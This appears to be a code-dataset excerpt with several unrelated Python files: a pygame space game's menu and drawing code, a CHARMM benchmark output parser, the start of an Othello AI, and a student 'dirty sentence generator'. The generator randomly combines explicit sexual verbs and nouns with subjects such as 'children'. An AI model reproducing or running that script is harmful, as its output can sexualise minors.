self.playerShip.trajectory=list(zip(*calcTrajectory(self.playerShip.position, self.playerShip.speed, self.levelGravity, self.planetarySystem))[0])\r\n self.playerShip.changeTrajectory=False\r\n trajectorySurf=pygame.Surface((WINDOWWIDTH, WINDOWHEIGHT))\r\n trajectorySurf.fill(BLACK)\r\n trajectorySurf.set_colorkey(BLACK)\r\n count=0\r\n for i in self.playerShip.trajectory:\r\n if count%10==0:\r\n pygame.draw.circle(trajectorySurf, trajColor, (int(i.x), int(i.y)), 2)\r\n count+=1\r\n trajectorySurf.set_alpha(128)\r\n displaySurf.blit(trajectorySurf, (0,0))\r\n \r\n #print('draw objects')\r\n\r\n self.tailGroup.draw(displaySurf)\r\n self.planetarySystem.draw(displaySurf)\r\n self.asteroidBelt.draw(displaySurf)\r\n self.plasmaShots.draw(displaySurf)\r\n self.startGroup.draw(displaySurf)\r\n self.explosionGroup.draw(displaySurf)\r\n self.minerals.draw(displaySurf)\r\n\r\n #draw finish active if required minerals are collected\r\n \r\n for f in self.finishGroup:\r\n if self.playerShip.mineralCount>=self.requiredMinerals and f.active==False: f.activate()\r\n self.finishGroup.draw(displaySurf)\r\n\r\n #draw player\r\n self.ships.draw(displaySurf)\r\n\r\n #draw asteroid catcher\r\n if self.playerShip.alive and not self.playerShip.finish:\r\n pygame.draw.circle(displaySurf, BLUE, (int(self.playerShip.catcherCenter.x), int(self.playerShip.catcherCenter.y)), 0)\r\n pygame.draw.circle(displaySurf, BLUE, (int(self.playerShip.catcherCenter.x), int(self.playerShip.catcherCenter.y)), int(self.playerShip.catcherRadius), 1)\r\n #draw freindly orbits and foe fire radii\r\n for p in self.planetarySystem:\r\n if isinstance(p, frPlanet):\r\n for i in p.orbit:\r\n pygame.draw.circle(displaySurf, GREEN, (int(i[0]), int(i[1])), 0)\r\n if isinstance(p, foePlanet):\r\n pygame.draw.circle(displaySurf, RED, (int(p.position.x), int(p.position.y)), int(p.fireRadius), 1)\r\n\r\n \r\n\r\n # module to see ship's movement characteristics\r\n '''textAngle=myfont.render(\"Angle %f\" %self.playerShip.angle, 1, RED) # text of current angle\r\n textAcc=myfont.render(\"angle to planet %f\" %((400.0 - self.playerShip.position.x)/60.0), 1, RED) # text of current angle to planet\r\n textSpeed=myfont.render(\"Speed %f, %f\" %(self.playerShip.speed.x, self.playerShip.speed.y), 1, RED) #text of current speed\r\n textPosition=myfont.render(\"Position %f, %f\" %(self.playerShip.position.x, self.playerShip.position.y), 1, RED) #text of current position\r\n\r\n displaySurf.blit(textAngle, (100, 100))\r\n displaySurf.blit(textAcc, (100, 120))\r\n displaySurf.blit(textSpeed, (100, 140))\r\n displaySurf.blit(textPosition, (100, 160))'''\r\n #draw text\r\n textMinerals=bigFont.render(\"Minerals %d / %d\" %(self.playerShip.mineralCount, self.requiredMinerals), 1, WHITE)\r\n textFuel=bigFont.render(\"Fuel\", 1, ORANGE)\r\n startText=smallFont.render(\"start\", 1, GREEN)\r\n startTextWidth, startTextHeight=smallFont.size(\"start\")\r\n displaySurf.blit(startText, (self.start.x-int(startTextWidth/2), self.start.y-20-int(startTextHeight/2)))\r\n if self.playerShip.mineralCount>=self.requiredMinerals: finishText=smallFont.render(\"finish\", 1, PURPLE)\r\n else: finishText=smallFont.render(\"finish\", 1, fadedPurpleColor)\r\n finishTextWidth, finishTextHeight=smallFont.size(\"finish\")\r\n displaySurf.blit(finishText, (self.finish.x-int(finishTextWidth/2), self.finish.y-20-int(finishTextHeight/2)))\r\n displaySurf.blit(textMinerals, (10,10))\r\n displaySurf.blit(textFuel, (590,10))\r\n\r\n #if death happend wait for 40 frames to show explosion animation\r\n if self.deathClock>0:\r\n if self.deathClock>=40:\r\n if self.gameMode.name=='campaign': self.changeMode(deathMode)\r\n elif self.gameMode.name=='training': self.changeMode(trDeathMode)\r\n elif self.gameMode.name=='random level': self.changeMode(finishRandomMode)\r\n self.deathClock=0\r\n else: self.deathClock+=1\r\n\r\n #if finish happend wait for 40 frames to show explosion animation\r\n if self.finishClock>0:\r\n if self.finishClock>=40:\r\n if self.gameMode.name=='campaign': self.changeMode(finishMode)\r\n elif self.gameMode.name=='training': self.changeMode(trFinishMode)\r\n elif self.gameMode.name=='random level': self.changeMode(finishRandomMode)\r\n self.finishClock=0\r\n else: self.finishClock+=1\r\n \r\n #if game is paused draw labeles for pause and and cover semitransperant surface\r\n if self.paused:\r\n coverSurface=pygame.Surface((WINDOWWIDTH, WINDOWHEIGHT))\r\n coverSurface.set_alpha(100)\r\n displaySurf.blit(coverSurface, (0,0))\r\n for l in self.pausedLabels:\r\n l.draw(displaySurf)\r\n \r\n \r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n\r\n elif self.gameMode.name=='death':\r\n displaySurf.blit(menuBackground, (0,0))\r\n headText=hugeFont.render(\"Your ship is crashed\", 1, titleColor)\r\n headTextWidth, headTextHeight=hugeFont.size(\"Your ship is crashed\")\r\n displaySurf.blit(headText, (400-int(headTextWidth/2), 230-int(headTextHeight/2)))\r\n #draw death menu\r\n for b in self.gameMode.buttons:\r\n b.update(displaySurf, self.mousePressed)\r\n #??if any button pressed - change game mode accordingly\r\n if b.buttonPressed==True:\r\n if b.text=='RETRY LEVEL':\r\n self.currentLevel.load(self.currentLevel.number)\r\n self.changeMode(campaignMode) \r\n elif b.text=='MAIN MENU':\r\n self.changeMode(mainMenuMode)\r\n f=open(\"currentLevel\", 'r+')\r\n f.write(\"%d\\n\" %self.currentLevel.number)\r\n f.close()\r\n b.buttonPressed=False\r\n self.mousePressed=(0,0) \r\n \r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n\r\n elif self.gameMode.name=='training death':\r\n displaySurf.blit(menuBackground, (0,0))\r\n headText=hugeFont.render(\"Your ship is crashed\", 1, titleColor)\r\n headTextWidth, headTextHeight=hugeFont.size(\"Your ship is crashed\")\r\n displaySurf.blit(headText, (400-int(headTextWidth/2), 230-int(headTextHeight/2)))\r\n #draw death menu\r\n for b in self.gameMode.buttons:\r\n b.update(displaySurf, self.mousePressed)\r\n #??if any button pressed - change game mode accordingly\r\n if b.buttonPressed==True:\r\n if b.text=='RETRY LEVEL':\r\n self.currentLevel.load(self.currentLevel.number, 'training')\r\n self.changeMode(trainingMode) \r\n elif b.text=='MAIN MENU':\r\n self.changeMode(mainMenuMode)\r\n b.buttonPressed=False\r\n self.mousePressed=(0,0) \r\n \r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n\r\n elif self.gameMode.name=='finish':\r\n displaySurf.blit(menuBackground, (0,0))\r\n headText=hugeFont.render(\"Mission accomplished\", 1, titleColor)\r\n headTextWidth, headTextHeight=hugeFont.size(\"Mission accomplished\")\r\n displaySurf.blit(headText, (400-int(headTextWidth/2), 230-int(headTextHeight/2)))\r\n #draw death menu\r\n for b in self.gameMode.buttons:\r\n b.update(displaySurf, self.mousePressed)\r\n #??if any button pressed - change game mode accordingly\r\n if b.buttonPressed==True:\r\n if b.text=='RETRY LEVEL':\r\n self.currentLevel.load(self.currentLevel.number)\r\n self.changeMode(campaignMode) \r\n elif b.text=='MAIN MENU':\r\n self.changeMode(mainMenuMode)\r\n f=open(\"currentLevel\", 'r+')\r\n f.write(\"%d\\n\" %self.currentLevel.number)\r\n f.close()\r\n elif b.text=='NEXT LEVEL':\r\n self.currentLevel.load(self.currentLevel.number+1)\r\n self.changeMode(campaignMode)\r\n b.buttonPressed=False\r\n self.mousePressed=(0,0) \r\n \r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n \r\n elif self.gameMode.name=='training finish':\r\n displaySurf.blit(menuBackground, (0,0))\r\n headText=hugeFont.render(\"Mission accomplished\", 1, titleColor)\r\n headTextWidth, headTextHeight=hugeFont.size(\"Mission accomplished\")\r\n displaySurf.blit(headText, (400-int(headTextWidth/2), 230-int(headTextHeight/2)))\r\n #draw death menu\r\n for b in self.gameMode.buttons:\r\n b.update(displaySurf, self.mousePressed)\r\n #??if any button pressed - change game mode accordingly\r\n if b.buttonPressed==True:\r\n if b.text=='RETRY LEVEL':\r\n self.currentLevel.load(self.currentLevel.number, 'training')\r\n self.changeMode(trainingMode) \r\n elif b.text=='MAIN MENU':\r\n self.changeMode(mainMenuMode)\r\n elif b.text=='NEXT LEVEL':\r\n self.currentLevel.load(self.currentLevel.number+1, 'training')\r\n self.changeMode(trainingMode)\r\n b.buttonPressed=False\r\n self.mousePressed=(0,0) \r\n \r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n\r\n elif self.gameMode.name=='finish random':\r\n displaySurf.blit(menuBackground, (0,0))\r\n headText=hugeFont.render(\"Mission accomplished\", 1, titleColor)\r\n headTextWidth, headTextHeight=hugeFont.size(\"Mission accomplished\")\r\n displaySurf.blit(headText, (400-int(headTextWidth/2), 230-int(headTextHeight/2)))\r\n #draw death menu\r\n for b in self.gameMode.buttons:\r\n b.update(displaySurf, self.mousePressed)\r\n #??if any button pressed - change game mode accordingly\r\n if b.buttonPressed==True:\r\n if b.text=='NEW RANDOM MAP':\r\n randomLevelMode=mode('random level', [])\r\n self.currentLevel.getRandom()\r\n self.changeMode(randomLevelMode)\r\n elif b.text=='MAIN MENU':\r\n self.changeMode(mainMenuMode)\r\n elif b.text=='RETRY LEVEL':\r\n randomLevelMode=mode('random level', [])\r\n self.changeMode(randomLevelMode)\r\n b.buttonPressed=False\r\n self.mousePressed=(0,0) \r\n \r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n\r\n elif self.gameMode.name=='help':\r\n displaySurf.blit(helpPageImg, (0,0))\r\n #draw help page\r\n for b in self.gameMode.buttons:\r\n b.update(displaySurf, self.mousePressed)\r\n #??if any button pressed - change game mode accordingly\r\n if b.buttonPressed==True:\r\n if b.text=='MAIN MENU':\r\n self.changeMode(mainMenuMode)\r\n b.buttonPressed=False\r\n self.mousePressed=(0,0) \r\n \r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n\r\n elif self.gameMode.name=='win':\r\n displaySurf.blit(menuBackground, (0,0))\r\n headText1=hugeFont.render(\"You accomplished all the missions\", 1, titleColor)\r\n headTextWidth1, headTextHeight1=hugeFont.size(\"You accomplished all the missions\")\r\n displaySurf.blit(headText1, (400-int(headTextWidth1/2), 170-int(headTextHeight1/2)))\r\n headText2=hugeFont.render(\"Congratulations\", 1, titleColor)\r\n headTextWidth2, headTextHeight2=hugeFont.size(\"Congratulations\")\r\n displaySurf.blit(headText2, (400-int(headTextWidth2/2), 230-int(headTextHeight2/2)))\r\n #draw help page\r\n for b in self.gameMode.buttons:\r\n b.update(displaySurf, self.mousePressed)\r\n #??if any button pressed - change game mode accordingly\r\n if b.buttonPressed==True:\r\n if b.text=='MAIN MENU':\r\n self.changeMode(mainMenuMode)\r\n b.buttonPressed=False\r\n self.mousePressed=(0,0) \r\n \r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n\r\n elif self.gameMode.name=='training win':\r\n displaySurf.blit(menuBackground, (0,0))\r\n headText1=hugeFont.render(\"You accomplished the training\", 1, titleColor)\r\n headTextWidth1, headTextHeight1=hugeFont.size(\"You accomplished the training\")\r\n displaySurf.blit(headText1, (400-int(headTextWidth1/2), 170-int(headTextHeight1/2)))\r\n headText2=hugeFont.render(\"Move to the campaign\", 1, titleColor)\r\n headTextWidth2, headTextHeight2=hugeFont.size(\"Move to the campaign\")\r\n displaySurf.blit(headText2, (400-int(headTextWidth2/2), 230-int(headTextHeight2/2)))\r\n #draw death menu\r\n for b in self.gameMode.buttons:\r\n b.update(displaySurf, self.mousePressed)\r\n #??if any button pressed - change game mode accordingly\r\n if b.buttonPressed==True: \r\n if b.text=='MAIN MENU':\r\n self.changeMode(mainMenuMode)\r\n elif b.text=='CAMPAIGN':\r\n self.currentLevel=level(1)\r\n self.changeMode(campaignMode)\r\n b.buttonPressed=False\r\n self.mousePressed=(0,0) \r\n \r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n \r\n \r\n def changeMode(self, nextMode):\r\n global campaignMode\r\n global randomLevelMode\r\n if nextMode.name=='campaign':\r\n if not self.currentLevel.winSituation:\r\n campaignMode=mode('campaign', [])\r\n #set planets and other objects form level\r\n self.planetarySystem=self.currentLevel.planetarySystem\r\n self.asteroidBelt=self.currentLevel.asteroidBelt\r\n self.tailGroup=self.currentLevel.tailGroup\r\n self.startGroup=self.currentLevel.startGroup\r\n self.finishGroup=self.currentLevel.finishGroup\r\n self.asteroidSpawnPoints=self.currentLevel.asteroidSpawnPoints\r\n self.plasmaShots=self.currentLevel.plasmaShots\r\n self.explosionGroup=self.currentLevel.explosionGroup\r\n self.start=self.currentLevel.start\r\n self.finish=self.currentLevel.finish\r\n #set group of minerls sprites\r\n self.minerals=self.currentLevel.minerals\r\n self.requiredMinerals=self.currentLevel.requiredMinerals\r\n self.pausedLabels=self.currentLevel.pausedLabels\r\n #create gravity field\r\n self.levelGravity=gravityField(self.planetarySystem)\r\n #set player's ship\r\n self.playerShip = battleShip(self.start)\r\n self.ships=pygame.sprite.Group()\r\n self.ships.add(self.playerShip)\r\n self.gameMode=campaignMode\r\n else:\r\n self.gameMode=winMenuMode\r\n elif nextMode.name=='training':\r\n if not self.currentLevel.trWinSituation:\r\n self.planetarySystem=self.currentLevel.planetarySystem\r\n self.asteroidBelt=self.currentLevel.asteroidBelt\r\n self.tailGroup=self.currentLevel.tailGroup\r\n self.startGroup=self.currentLevel.startGroup\r\n self.finishGroup=self.currentLevel.finishGroup\r\n self.asteroidSpawnPoints=self.currentLevel.asteroidSpawnPoints\r\n self.plasmaShots=self.currentLevel.plasmaShots\r\n self.explosionGroup=self.currentLevel.explosionGroup\r\n self.start=self.currentLevel.start\r\n self.finish=self.currentLevel.finish\r\n #set group of minerls sprites\r\n self.minerals=self.currentLevel.minerals\r\n self.requiredMinerals=self.currentLevel.requiredMinerals\r\n self.pausedLabels=self.currentLevel.pausedLabels\r\n #create gravity field\r\n self.levelGravity=gravityField(self.planetarySystem)\r\n #set player's ship\r\n self.playerShip = battleShip(self.currentLevel.start)\r\n self.ships=pygame.sprite.Group()\r\n self.ships.add(self.playerShip)\r\n self.paused=True\r\n self.gameMode=trainingMode\r\n else:\r\n self.gameMode=trWinMenuMode\r\n elif nextMode.name=='death':\r\n self.gameMode=deathMode\r\n elif nextMode.name=='training death':\r\n self.gameMode=trDeathMode\r\n elif nextMode.name=='training finish':\r\n self.gameMode=trFinishMode\r\n elif nextMode.name=='main menu':\r\n self.gameMode=mainMenuMode\r\n elif nextMode.name=='finish':\r\n self.gameMode=finishMode\r\n elif nextMode.name=='help':\r\n self.gameMode=helpPageMode\r\n elif nextMode.name=='random level':\r\n #set planets and other objects form level\r\n self.planetarySystem=self.currentLevel.planetarySystem\r\n self.asteroidBelt=self.currentLevel.asteroidBelt\r\n self.tailGroup=self.currentLevel.tailGroup\r\n self.startGroup=self.currentLevel.startGroup\r\n self.finishGroup=self.currentLevel.finishGroup\r\n self.asteroidSpawnPoints=self.currentLevel.asteroidSpawnPoints\r\n self.plasmaShots=self.currentLevel.plasmaShots\r\n self.explosionGroup=self.currentLevel.explosionGroup\r\n self.start=self.currentLevel.start\r\n self.finish=self.currentLevel.finish\r\n #set group of minerls sprites\r\n self.minerals=self.currentLevel.minerals\r\n self.requiredMinerals=0\r\n self.pausedLabels=self.currentLevel.pausedLabels\r\n #create gravity field\r\n self.levelGravity=gravityField(self.planetarySystem)\r\n #set player's ship\r\n self.playerShip = battleShip(self.currentLevel.start)\r\n self.ships=pygame.sprite.Group()\r\n self.ships.add(self.playerShip)\r\n #set group of minerls sprites\r\n self.minerals=pygame.sprite.Group()\r\n self.gameMode=randomLevelMode\r\n elif nextMode.name=='finish random':\r\n self.gameMode=finishRandomMode\r\n\r\n \r\n#construct main menu mode\r\nmainMenuButtons=[]\r\nmainMenuButtons.append(button((400, 300), buttonImg, buttonPressedImg, 'NEW CAMPAIGN'))\r\nmainMenuButtons.append(button((400, 350), buttonImg, buttonPressedImg, 'RESUME CAMPAIGN'))\r\nmainMenuButtons.append(button((400, 400), buttonImg, buttonPressedImg, 'HOW TO PLAY'))\r\nmainMenuButtons.append(button((400, 450), buttonImg, buttonPressedImg, 'RANDOM MAP'))\r\nmainMenuButtons.append(button((400, 500), buttonImg, buttonPressedImg, 'HELP'))\r\nmainMenuButtons.append(button((400, 550), buttonImg, buttonPressedImg, 'EXIT'))\r\n\r\nmainMenuMode=mode('main menu', mainMenuButtons)\r\n\r\n#construct campaign mode\r\ncampaignMode=mode('campaign', [])\r\n\r\n#construct random level mode\r\nrandomLevelMode=mode('random level', [])\r\n\r\n#construct training mode\r\ntrainingMode=mode('training', [])\r\n\r\n#construct death menu mode\r\ndeathModeButtons=[]\r\ndeathModeButtons.append(button((400, 450), buttonImg, buttonPressedImg, 'RETRY LEVEL'))\r\ndeathModeButtons.append(button((400, 510), buttonImg, buttonPressedImg, 'MAIN MENU'))\r\ndeathMode=mode('death', deathModeButtons)\r\n\r\n#construct death in training menu mode\r\ntrDeathModeButtons=[]\r\ntrDeathModeButtons.append(button((400, 450), buttonImg, buttonPressedImg, 'RETRY LEVEL'))\r\ntrDeathModeButtons.append(button((400, 510), buttonImg, buttonPressedImg, 'MAIN MENU'))\r\ntrDeathMode=mode('training death', trDeathModeButtons)\r\n\r\n#construct finish menu mode\r\nfinishMenuButtons=[]\r\nfinishMenuButtons.append(button((400, 420), buttonImg, buttonPressedImg, 'NEXT LEVEL'))\r\nfinishMenuButtons.append(button((400, 480), buttonImg, buttonPressedImg, 'RETRY LEVEL'))\r\nfinishMenuButtons.append(button((400, 540), buttonImg, buttonPressedImg, 'MAIN MENU'))\r\nfinishMode=mode('finish', finishMenuButtons)\r\n\r\n#construct training finish menu mode\r\ntrFinishMenuButtons=[]\r\ntrFinishMenuButtons.append(button((400, 420), buttonImg, buttonPressedImg, 'NEXT LEVEL'))\r\ntrFinishMenuButtons.append(button((400, 480), buttonImg, buttonPressedImg, 'RETRY LEVEL'))\r\ntrFinishMenuButtons.append(button((400, 540), buttonImg, buttonPressedImg, 'MAIN MENU'))\r\ntrFinishMode=mode('training finish', trFinishMenuButtons)\r\n\r\n#construct finish random level mode\r\nfinishRandomButtons=[]\r\nfinishRandomButtons.append(button((400, 420), buttonImg, buttonPressedImg, 'NEW RANDOM MAP'))\r\nfinishRandomButtons.append(button((400, 480), buttonImg, buttonPressedImg, 'RETRY LEVEL'))\r\nfinishRandomButtons.append(button((400, 540), buttonImg, buttonPressedImg, 'MAIN MENU'))\r\nfinishRandomMode=mode('finish random', finishRandomButtons)\r\n\r\n#construct help page\r\nhelpPageButtons=[]\r\nhelpPageButtons.append(button((400, 540), buttonImg, buttonPressedImg, 'MAIN MENU'))\r\nhelpPageMode=mode('help', helpPageButtons)\r\n\r\n#construct win menu mode\r\nwinButtons=[]\r\nwinButtons.append(button((400, 540), buttonImg, buttonPressedImg, 'MAIN MENU'))\r\nwinMenuMode=mode('win', winButtons)\r\n\r\n#construct training win menu mode\r\ntrWinButtons=[]\r\ntrWinButtons.append(button((400, 480), buttonImg, buttonPressedImg, 'CAMPAIGN'))\r\ntrWinButtons.append(button((400, 540), buttonImg, buttonPressedImg, 'MAIN MENU'))\r\ntrWinMenuMode=mode('training win', trWinButtons)\r\n\r\n\r\ndef main():\r\n\r\n DISPLAYSURF.fill(WHITE)\r\n DISPLAYSURF.set_colorkey(WHITE)\r\n pygame.display.update()\r\n\r\n spaceGame=game(mainMenuMode)\r\n keyInputHandler=inputHandler()\r\n previousKeys=pygame.key.get_pressed()\r\n\r\n \r\n while True:\r\n\r\n spaceGame.update(DISPLAYSURF)\r\n\r\n keys=pygame.key.get_pressed()\r\n\r\n keyInputHandler.update(keys, previousKeys, spaceGame)\r\n\r\n previousKeys=keys\r\n\r\nif __name__== '__main__':\r\n main()\r\n","sub_path":"Space adventures.py","file_name":"Space adventures.py","file_ext":"py","file_size_in_byte":84513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"454614944","text":"import re\nimport os\nimport sys\nfrom akrr.parsers.akrrappkeroutputparser import AppKerOutputParser\n\n\ndef process_appker_output(appstdout=None, stdout=None, stderr=None, geninfo=None, proclog=None, \n resource_appker_vars=None):\n # set App Kernel Description\n parser = AppKerOutputParser(\n name='charmm',\n version=1,\n description=\"CHARMM: Chemistry at Harvard Macromolecular Mechanics\",\n url='http://www.charmm.org',\n measurement_name='CHARMM'\n )\n # set obligatory parameters and statistics\n # set common parameters and statistics\n parser.add_common_must_have_params_and_stats()\n # set app kernel custom sets\n parser.add_must_have_parameter('App:Version')\n parser.add_must_have_parameter('Input:Number of Angles')\n parser.add_must_have_parameter('Input:Number of Atoms')\n parser.add_must_have_parameter('Input:Number of Bonds')\n parser.add_must_have_parameter('Input:Number of Dihedrals')\n parser.add_must_have_parameter('Input:Number of Steps')\n parser.add_must_have_parameter('Input:Timestep')\n\n parser.add_must_have_statistic('Molecular Dynamics Simulation Performance')\n parser.add_must_have_statistic('Time Spent in External Energy Calculation')\n parser.add_must_have_statistic('Time Spent in Integration')\n parser.add_must_have_statistic('Time Spent in Internal Energy Calculation')\n parser.add_must_have_statistic('Time Spent in Non-Bond List Generation')\n parser.add_must_have_statistic('Time Spent in Waiting (Load Unbalance-ness)')\n parser.add_must_have_statistic('User Time')\n parser.add_must_have_statistic('Wall Clock Time')\n\n # parse common parameters and statistics\n parser.parse_common_params_and_stats(appstdout, stdout, stderr, geninfo, resource_appker_vars)\n\n # read output\n lines = []\n if os.path.isfile(appstdout):\n fin = open(appstdout, \"rt\")\n lines = fin.readlines()\n fin.close()\n\n # process the output\n parser.successfulRun = False\n wall_clock_time = 0.0\n num_steps = 0\n step_size = 0.0\n time_breakdown_columns = None\n num_atoms = 0\n num_bonds = 0\n num_angles = 0\n num_dihedrals = 0\n\n j = 0\n while j < len(lines):\n\n m0 = re.search(r'\\s+Chemistry at HARvard Macromolecular Mechanics', lines[j])\n m1 = re.search(r'\\sVersion\\s+([\\da-zA-Z]+)', lines[j + 1])\n if m0 and m1:\n parser.set_parameter(\"App:Version\", m1.group(1).strip())\n\n if re.search(r'Summary of the structure file counters', lines[j]):\n j += 1\n for k in range(256):\n if re.search(r'CHARMM>', lines[j]):\n break\n\n m = re.search(r'Number of atoms\\s+=\\s+(\\d+)', lines[j])\n if m:\n num_atoms += int(m.group(1).strip())\n\n m = re.search(r'Number of bonds\\s+=\\s+(\\d+)', lines[j])\n if m:\n num_bonds += int(m.group(1).strip())\n\n m = re.search(r'Number of angles\\s+=\\s+(\\d+)', lines[j])\n if m:\n num_angles += int(m.group(1).strip())\n\n m = re.search(r'Number of dihedrals\\s+=\\s+(\\d+)', lines[j])\n if m:\n num_dihedrals += int(m.group(1).strip())\n\n j += 1\n\n if re.search(r' found', lines[j]):\n j += 1\n for k in range(256):\n if re.search(r'NUMBER OF DEGREES OF FREEDOM', lines[j]):\n break\n\n m = re.search(r'NSTEP\\s+=\\s+(\\d+)', lines[j])\n if m:\n num_steps = int(m.group(1).strip())\n parser.set_parameter(\"Input:Number of Steps\", num_steps)\n\n if re.search(r'TIME STEP\\s+=', lines[j]):\n m = re.search(r'([\\d\\-Ee.]+)\\s+PS', lines[j])\n if m:\n step_size = 1000.0 * float(m.group(1).strip())\n parser.set_parameter(\"Input:Timestep\", step_size * 1e-15, \"Second per Step\")\n j += 1\n\n if re.search(r'NORMAL TERMINATION BY NORMAL STOP', lines[j]):\n parser.successfulRun = True\n\n if re.search(r'JOB ACCOUNTING INFORMATION', lines[j]):\n parser.successfulRun = True\n\n j += 1\n for k in range(256):\n if j > len(lines) - 1:\n break\n m = re.search(r'ELAPSED TIME:\\s*([\\d.]+)\\s*MINUTES', lines[j])\n if m:\n wall_clock_time = 60.0 * float(m.group(1).strip())\n parser.set_statistic(\"Wall Clock Time\", wall_clock_time, \"Second\")\n\n m = re.search(r'CPU TIME:\\s*([\\d.]+)\\s*MINUTES', lines[j])\n if m:\n parser.set_statistic(\"User Time\", 60.0 * float(m.group(1).strip()), \"Second\")\n\n m = re.search(r'ELAPSED TIME:\\s*([\\d.]+)\\s*SECONDS', lines[j])\n if m:\n wall_clock_time = float(m.group(1).strip())\n parser.set_statistic(\"Wall Clock Time\", wall_clock_time, \"Second\")\n\n m = re.search(r'CPU TIME:\\s*([\\d.]+)\\s*SECONDS', lines[j])\n if m:\n parser.set_statistic(\"User Time\", m.group(1).strip(), \"Second\")\n\n j += 1\n if j > len(lines) - 1:\n break\n\n if re.search(r'Parallel load balance \\(sec', lines[j]):\n j += 1\n # grab the column headers from the output, e.g.\n #\n # Parallel load balance (sec.):\n # Node Eext Eint Wait Comm List Integ Total\n # 0 205.5 6.4 1.2 31.2 23.2 2.8 270.4\n # 1 205.2 7.3 1.1 31.2 23.3 3.2 271.2\n # 2 205.2 7.7 0.6 32.3 23.3 3.2 272.3\n # 3 205.2 7.8 0.6 32.1 23.3 3.3 272.3\n # PARALLEL> Average timing for all nodes:\n # 4 205.3 7.3 0.9 31.7 23.3 3.1 271.6\n time_breakdown_columns = lines[j].strip().split()\n\n if re.search(r'PARALLEL>\\s*Average timing for all nodes', lines[j]) and time_breakdown_columns:\n j += 1\n time_breakdown = lines[j].strip().split()\n if len(time_breakdown_columns) == len(time_breakdown):\n for k in range(len(time_breakdown)):\n if time_breakdown_columns[k] == \"Eext\":\n parser.set_statistic(\"Time Spent in External Energy Calculation\", time_breakdown[k], \"Second\")\n if time_breakdown_columns[k] == \"Eint\":\n parser.set_statistic(\"Time Spent in Internal Energy Calculation\", time_breakdown[k], \"Second\")\n if time_breakdown_columns[k] == \"Wait\":\n parser.set_statistic(\"Time Spent in Waiting (Load Unbalance-ness)\", time_breakdown[k], \"Second\")\n if time_breakdown_columns[k] == \"List\":\n parser.set_statistic(\"Time Spent in Non-Bond List Generation\", time_breakdown[k], \"Second\")\n if time_breakdown_columns[k] == \"Integ\":\n parser.set_statistic(\"Time Spent in Integration\", time_breakdown[k], \"Second\")\n\n j += 1\n if num_atoms > 0:\n parser.set_parameter(\"Input:Number of Atoms\", num_atoms)\n if num_bonds > 0:\n parser.set_parameter(\"Input:Number of Bonds\", num_bonds)\n if num_angles > 0:\n parser.set_parameter(\"Input:Number of Angles\", num_angles)\n if num_dihedrals > 0:\n parser.set_parameter(\"Input:Number of Dihedrals\", num_dihedrals)\n\n if wall_clock_time > 0.0 and num_steps > 0 and step_size > 0.0:\n # $stepSize is in femtoseconds\n # $wallClockTime is in seconds\n parser.set_statistic(\"Molecular Dynamics Simulation Performance\",\n (1e-6 * step_size * num_steps) / (wall_clock_time / 86400.0) * 1e-9, \"Second per Day\")\n\n if __name__ == \"__main__\":\n # output for testing purpose\n print(\"parsing complete:\", parser.parsing_complete())\n parser.print_params_stats_as_must_have()\n print(parser.get_xml())\n\n # return complete XML overwize return None\n return parser.get_xml()\n\n\nif __name__ == \"__main__\":\n \"\"\"stand alone testing\"\"\"\n jobdir = sys.argv[1]\n print(\"Proccessing Output From\", jobdir)\n process_appker_output(appstdout=os.path.join(jobdir, \"appstdout\"), geninfo=os.path.join(jobdir, \"gen.info\"))\n","sub_path":"akrr/parsers/charmm_parser.py","file_name":"charmm_parser.py","file_ext":"py","file_size_in_byte":8581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"426896569","text":"#Author: Steven Touchstone\n#Purpose: This is a dirty alternative to \"awefulpeotry1.py\"\n#Date: 10/16/18\n\nimport random\narticles = (\"The\",\"Some\",\"Most\",\"No\",\"Any\",\"All\")\nsubjects = (\"girls\",\"boys\",\"men\",\"women\",\"children\",\"elderly\",\"people\",\"humans\",\"nymphos\",\"lesbians\",\"gays\")\nverbs = (\"love\",\"like\",\"rub\",\"suck\",\"fuck\",\"lick\",\"masterbate\",\"finger\",\"carress\",\"tickle\",\"kiss\",\"stroke\",\"swallow\",\"smell\",\"gang bang\")\nnouns = (\"nipples\",\"dicks\",\"pussies\",\"breasts\",\"clits\",\"willies\",\"penises\",\"peckers\",\"vaginas\",\"balls\",\"assholes\",\"dildos\",\"cum\",\"toys\")\nadverbs = (\"loudly\",\"quietly\",\"well\",\"badly\",\"rudely\",\"terribly\",\"vigourously\",\"lovingly\",\"quickly\",\"hungrily\")\ncount = 0\n\nwhile count <= 5:\n\tstyle = random.randint(1,2)\n\tif style == 1:\n\t\tsub = random.choice(subjects)\n\t\tver = random.choice(verbs)\n\t\tnon = random.choice(nouns)\n\t\tprint(sub,ver,non)\n\tif style == 2:\n\t\tart = random.choice(articles)\n\t\tsub = random.choice(subjects)\n\t\tver = random.choice(verbs)\n\t\tnon = random.choice(nouns)\n\t\tadv = random.choice(adverbs)\n\t\tprint(art,sub,ver,non,adv)\n\tcount += 1","sub_path":"Python_Class/dirty_sentence_gen.py","file_name":"dirty_sentence_gen.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"245628367","text":"#Trabalho da disciplina inteligencia artificial periodo 2017.1 DCC UFRJ\n#Grupo: David Gomes e Mauricio Borges\n#Professor: Joao Carlos\n\nimport copy #Utilizado para copiar listas e matrizes\nimport sys #Utilizado para implementar infinito computacional \n\nclass infinity:\n \n def __init__(self, color):\n self.color = color\n #Inicializa o numero de jogadas ja realizadas\n global njogadas\n njogadas = 0\n\n#############################################################################################\n####################### HEURISTICAS DE JOGO #################################################\n\n def amadoscantos(self, board): #Quem domina os cantos tem maior chance de vitoria : [1][1],[1][8],[8][1],[8][8]\n resultado = 0\n cantos = (1,8)\n for i in cantos:\n for j in cantos:\n if board.board[i][j] == self.color:\n resultado += sys.maxint\n elif 